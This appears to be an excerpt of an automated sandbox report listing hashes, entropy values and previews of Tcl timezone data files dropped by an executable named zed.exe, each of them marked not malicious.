                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Madrid) {.. {-9223372036854775808 -884 0 LMT}.. {-2177452800 0 0 WET}.. {-1631926800 3600 1 WEST}.. {-1616889600 0 0 WET}.. {-1601168400 3600 1 WEST}.. {-1585353600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269820800 0 0 WET}.. {-1026954000 3600 1 WEST}.. {-1017619200 0 0 WET}.. {-1001898000 3600 1 WEST}.. {-999482400 7200 1 WEMT}.. {-986090400 3600 1 WEST}.. {-954115200 0 0 WET}.. {-940208400 3600 0 CET}.. {-873079200 7200 1 CEST}.. {-862621200 3600 0 CET}.. {-842839200 7200 1 CEST}.. {-828320400 3600 0 CET}.. {-811389600 7200 1 CEST}.. {-796870800 3600 0 CET}.. {-779940000 7200 1 CEST}.. {-765421200 3600 0 CET}.. {-74849
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8724
                                                                                                                                                                                                                                            Entropy (8bit):3.816380386871747
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:KAGvi2GmkwwnpH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZN:KLsww141sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:9B09D6EED8F23BAFFB62929C0115E852
                                                                                                                                                                                                                                            SHA1:4AEF15333C73C2836C09D818FD0E20440D7C4780
                                                                                                                                                                                                                                            SHA-256:C5C240BAAECE8235D1FBDD251C1A67CB2D2FC8195DD5BBE37FF9CFF0445FCDA2
                                                                                                                                                                                                                                            SHA-512:43AA3492BD335A290C6EFEE275B47EA18E544199E37A9BBAE2E350D42BDFF42F0E9ED461A4BB1824CA33F84A90D4060906844A3E22DA49C9821E4CB460832D6E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Malta) {.. {-9223372036854775808 3484 0 LMT}.. {-2403478684 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812588400 7200 1 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 3600 0 CET}.. {-81997200 7200 1 CEST}.. {-71715600 3600 0 CET}.. {-50547600 7200 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.959733196757503
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV1AYKjG5XHAIgoq2AYKjo0ARL/yQausWILMFJ8QaC:SlSWB9vsM3ymrAdjGJHAIgorAdjo0ANn
                                                                                                                                                                                                                                            MD5:C1844961691214F6E6DF6487788A7758
                                                                                                                                                                                                                                            SHA1:6D08E9FB7B8602A80622148BFACD9676F45F0E2B
                                                                                                                                                                                                                                            SHA-256:6136C3CFA4A767E7C9DDA23A283AD98B72E9868F192E6A8E3BFE6396F6989BD1
                                                                                                                                                                                                                                            SHA-512:B2D1EA51AC5B34792AC02820A9D60FD41F3B91AB6505896476FCB0DC339B8DC1DE9E2C89A7627F69E16247661AE8040D789FFD2F8F1CD59F243B57C4845B450F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Helsinki)]} {.. LoadTimeZoneFile Europe/Helsinki..}..set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2177
                                                                                                                                                                                                                                            Entropy (8bit):3.9354590900153172
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:K8cVnR7xhuHJkminzaVV04v3TfdGY3kNmneVuNlh000sGpde:5mnRtEpkmiSV3A8qcN
                                                                                                                                                                                                                                            MD5:9C10EAE9FA0DE192C5FD4F76E12606F0
                                                                                                                                                                                                                                            SHA1:AFD5650410EC3E6ED564A8B2ABF91709D090B4AD
                                                                                                                                                                                                                                            SHA-256:8C95EA696EA578DEF726502AC181AF475A676030878F56B4E2D667757BBD1C49
                                                                                                                                                                                                                                            SHA-512:3B9ED6B68858485B9A46A0863B7D9D3C1E4C5BBA269457F24A9A12C274F0F9B35E63D8C25EB53E7200DB57DD35ACCB7FD7D8AB005FEE2C4D7FC6E72E8CF57194
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Minsk) {.. {-9223372036854775808 6616 0 LMT}.. {-2840147416 6600 0 MMT}.. {-1441158600 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-899780400 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-804646800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {670374000 7200 0 EEMMTT}.. {670377600 10800 1 EEST}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.9089012087310095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtEXc4o3vXHAIgoquEXeRL/yQauPMFBx6QazEXcov:SlSWB9vsM3ymzESPHAIgozEON/ySRpEB
                                                                                                                                                                                                                                            MD5:2015CF8BBEEE12AF0D9C82FD2E246C72
                                                                                                                                                                                                                                            SHA1:062BFFBB266C3EBB5776A509DDB7A6044C82B864
                                                                                                                                                                                                                                            SHA-256:9DF16BB1C26100635DC4CB1DF409B0FA7B139C22BF09574ED337EE244CA3C546
                                                                                                                                                                                                                                            SHA-512:FD3479588D4F3B84CF6C8B8A5DB1AB3BFA0A87CA2FFADB4FEBBBB25711C77963BE7CD0D1DA5ED985D729F39C5B44E8CBD429F1E2DA813DF26272D66CAE4F425A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Paris)]} {.. LoadTimeZoneFile Europe/Paris..}..set TZData(:Europe/Monaco) $TZData(:Europe/Paris)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2430
                                                                                                                                                                                                                                            Entropy (8bit):3.942836780611272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:7fnjazk7e+LxhuHJkvVineTeCTU50x0Y7:7fnjazk7eoEpkvVieTeCTUax0Y7
                                                                                                                                                                                                                                            MD5:4547D47E9364ACAFB2A4BEE52D04BFBB
                                                                                                                                                                                                                                            SHA1:1E7F964692F81D49AEAF581FE70AD22D4E36226B
                                                                                                                                                                                                                                            SHA-256:31F9C3C2F17B3EE4FA6D9EE6A86BF407AC0377DE4D666C65E86CE5AC591F829F
                                                                                                                                                                                                                                            SHA-512:7F1D7C80A1BF611D5440EEF9085DA6CDED86B5EF4C2737C105640030E5AA998A0951182E72DC224190A25DA8846CDE856A78EBAA8876AA0B18B1CBCADBB060FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Moscow) {.. {-9223372036854775808 9017 0 LMT}.. {-2840149817 9017 0 MMT}.. {-1688265017 9079 0 MMT}.. {-1656819079 12679 1 MST}.. {-1641353479 9079 0 MMT}.. {-1627965079 16279 1 MDST}.. {-1618716679 12679 1 MST}.. {-1596429079 16279 1 MDST}.. {-1593820800 14400 0 MSD}.. {-1589860800 10800 0 MSK}.. {-1542427200 14400 1 MSD}.. {-1539493200 18000 1 +05}.. {-1525323600 14400 1 MSD}.. {-1491188400 7200 0 EET}.. {-1247536800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.7873368289068905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85GKLlXHAIgNwMGKLZRRL/yQatHefeWFKYGKL8n:SlSWB9vsM3yZdL1HAIgGMdLZRN/y3HeA
                                                                                                                                                                                                                                            MD5:BE82205480617CF07F76BA0DF06C95BC
                                                                                                                                                                                                                                            SHA1:46D2D8D9FE4FB570C2A09BC809B02C8960F9601F
                                                                                                                                                                                                                                            SHA-256:FC93B7516933EDFDC211AC0822EE88BF7ACAD1C58A0643B15294F82EB0F14414
                                                                                                                                                                                                                                            SHA-512:F490A70053A6011D80FB0A4E96D2871BFEEB168690E21C4EC31F2F5C0E24A67C706528C81322A1D48E71242F0FFA277550192925FDE5B1F34BFCB308290E11FC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Nicosia)]} {.. LoadTimeZoneFile Asia/Nicosia..}..set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.910647918749938
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQasWJAQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yI7Fv
                                                                                                                                                                                                                                            MD5:242748F361AD524CD8E288BEE8611E19
                                                                                                                                                                                                                                            SHA1:A636A544BB54851185E2BE83DAC69C813B824827
                                                                                                                                                                                                                                            SHA-256:C84E9C0D22059573079211CBF487072CAB95C14B5ECEFB596CF1F594ABD3458C
                                                                                                                                                                                                                                            SHA-512:404B272D0C6B70332052601EA65C0F7AE71C12F62D19FD3010BBA6FB25E4F2F95BB9E5F295D8494CBADB1AE9C7F833C42382AE7488317EA6F0C20E60B63BEFE8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Oslo) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9152
                                                                                                                                                                                                                                            Entropy (8bit):3.8506895725632746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:fySTO1C+4qoMYOKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdi:fdp+3Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:9CAF8C5C5AF630E7F782C0480DD786E7
                                                                                                                                                                                                                                            SHA1:9FBEF9EEDD8BAFB48B17E3AC388CFEF8DCD10CB0
                                                                                                                                                                                                                                            SHA-256:AE61491C4A587F56426A9F2118E31060276F2B0231E750C461781577551CA196
                                                                                                                                                                                                                                            SHA-512:F809744BB597184A2815758A27B6A07C515C65DB96CFFB3625FD059DEBBF05EE903E999483B3459C7C8D3991824746F8530CD1378F8A63B1F54F60CFACE9F89B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Paris) {.. {-9223372036854775808 561 0 LMT}.. {-2486592561 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1470618000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1253494800 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.910162937111088
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQazKIGl1/yQ0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNK
                                                                                                                                                                                                                                            MD5:52C36955D6BD1D9FE9CB64822D04B6DB
                                                                                                                                                                                                                                            SHA1:D5FF82EC486409E6FB314AD5ACE608577C9632CF
                                                                                                                                                                                                                                            SHA-256:B87630FF459DE07EB16CD0C2452660772E3FFC4EEB8419EA77A013B6F63A5900
                                                                                                                                                                                                                                            SHA-512:ABA49D3F05A41A4982600E4DA5C225D8994251F447401EE6FE8478E008BCD5D41C057034185B5CFF805634D571F3CC98EFE98093ABC8E6271351E11A4DA1E7AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8038
                                                                                                                                                                                                                                            Entropy (8bit):3.8240363895915914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Kr9+neXAS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlh:KnASs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:828134FA1263FEFA2B06A8B2F075F564
                                                                                                                                                                                                                                            SHA1:4B332DE6E0855F8B9517F7098A3FB439671FC349
                                                                                                                                                                                                                                            SHA-256:5D3AFED5C1B07C6C6635D6BDEB28A0FB4D11A61F25F26C91227B2254BE5F4AA0
                                                                                                                                                                                                                                            SHA-512:9AB1462CDBD7F13F0CECDCCC2D91A85D8C0576B71508F935D26638C25ED023CF8FF4BA4FFDA402B308E6142B135D1B9D88700A519DBE2381E8E945329A5354F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Prague) {.. {-9223372036854775808 3464 0 LMT}.. {-3786829064 3464 0 PMT}.. {-2469401864 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-777862800 7200 0 CEST}.. {-765327600 3600 0 CET}.. {-746578800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-728517600 0 1 GMT}.. {-721260000 0 0 CET}.. {-716425200 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654217200 7200 1 CEST}.. {-639010800 3600 0 CET}.. {283993200 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7658
                                                                                                                                                                                                                                            Entropy (8bit):3.7750218768791806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eq+cEpkjXkSV385aNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:ePWjUS7ivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:0D3C919F60081388524BD5DB22E6904B
                                                                                                                                                                                                                                            SHA1:6691EAB901C8B57D2F2693120A45A67799D05FCB
                                                                                                                                                                                                                                            SHA-256:8B64A42BAFD90F9255CACFDBAC603D638DD7C18DC27249F9C9B515E1DA634424
                                                                                                                                                                                                                                            SHA-512:62A2820B8C1C5468AC1F1BB626F9AAAD0BA1DEC5B73740F00FE4DB8CFA3F2BCF9947968E693824FC8770BA20AB962F93F7E5E345AE8A85F99CDB18E2B510308E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Riga) {.. {-9223372036854775808 5794 0 LMT}.. {-2840146594 5794 0 RMT}.. {-1632008194 9394 1 LST}.. {-1618702594 5794 0 RMT}.. {-1601681794 9394 1 LST}.. {-1597275394 5794 0 RMT}.. {-1377308194 7200 0 EET}.. {-928029600 10800 0 MSK}.. {-899521200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-795834000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {6
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8813
                                                                                                                                                                                                                                            Entropy (8bit):3.8168470239811736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:hhGvC2GmkNXEq74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhn:hUsF41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:C4F49446D3696301EDB339691DCB2FDB
                                                                                                                                                                                                                                            SHA1:537963A77B9BE9BE6B997A812A6E6DD120F6F247
                                                                                                                                                                                                                                            SHA-256:DCD2D9144507311E573568598E1FFD0E0574FB677AA0DAFC5641D80A19EB6E58
                                                                                                                                                                                                                                            SHA-512:1F0A9A549FA0995C51E90AC392671E3F09744B268F1EE6A27CA7E3C41C2B02A4BA0F98369BE40BA482FBA1FED8F1EE712F0B3217AD86164D1AD498E369C24D76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Rome) {.. {-9223372036854775808 2996 0 LMT}.. {-3252098996 2996 0 RMT}.. {-2403565200 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-830307600 7200 0 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-807152400 7200 0 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 36
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2118
                                                                                                                                                                                                                                            Entropy (8bit):3.664269700453612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:7PvCAs6kKR6aQmF1cSNWrI+AjQnTRYZ/YF0LUdt/LkajuZbIJltiabs2Tb:7HCAs6kC6aZF1cSN4I+AjQTRYZ/YF0Lw
                                                                                                                                                                                                                                            MD5:965D987F6576F66A08871697144D4CDB
                                                                                                                                                                                                                                            SHA1:AF7226DF81C2B3C3A5832F59FC708A6BCBF389CA
                                                                                                                                                                                                                                            SHA-256:8F395352AA05D35E7D13380E73659A0D5B56FFC17E3F4E40E4F678A902F0E49B
                                                                                                                                                                                                                                            SHA-512:B82E0CFA5EDA0FCDF03609AE439255F8937A7E9EFA0AFE15EA8877316782AFC74514BCD2B4F06F1B5F0F3C5A64A933D73CB50D5AED2BB1491BD6CACBB77B10E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Samara) {.. {-9223372036854775808 12020 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-1102305600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 10800 0 +03}.. {687916800 14400 0 +04}.. {701820000 18000 1 +05}.. {717544800 14400 0 +04}.. {733
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.955758257767983
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQawELDX7x/yQaxE:SlSWB9vsM3ymx5PHAIgoxvN/yt/yrE
                                                                                                                                                                                                                                            MD5:D253DA6880630A31D39DB0CFA4933ABD
                                                                                                                                                                                                                                            SHA1:E5798DAAE574729685FE489F296B964BC1CCF2E4
                                                                                                                                                                                                                                            SHA-256:B6856A0E38C2404F7D5FA1821559503F8AE70923A562F0D993124D131515F395
                                                                                                                                                                                                                                            SHA-512:CFB6005F3E8D1C585AF36EB7A8C9F49760EF6F446C97E7804EB61EFD0804424C4FB6AE81B71C5A867274EF89A17DAC0D2A0FF882A0F6AEA1D5FFD51593726C5F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/San_Marino) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.937834327554967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawEX3GEaQa5:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNZ
                                                                                                                                                                                                                                            MD5:F7C7DAE9C5D371EF9EE1F490246ED3CC
                                                                                                                                                                                                                                            SHA1:40C388FE2A55078C8E0524A4385B3F8846960E24
                                                                                                                                                                                                                                            SHA-256:BC00D953C2F3E55E40EDA13838AB66B9E9D0BDAD620E4EB917637761ABB06FB1
                                                                                                                                                                                                                                            SHA-512:EB22C59F4D58D96797A718FC59B010795F587626E456D44A3E6398E0FBF4ECD97BCDC151BC1359151798B5AF2964FE5708233F8ECD0D344C3E27629F2645687F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2061
                                                                                                                                                                                                                                            Entropy (8bit):3.6638125261109824
                                                                                                                                                                                                                                            Encrypted:false
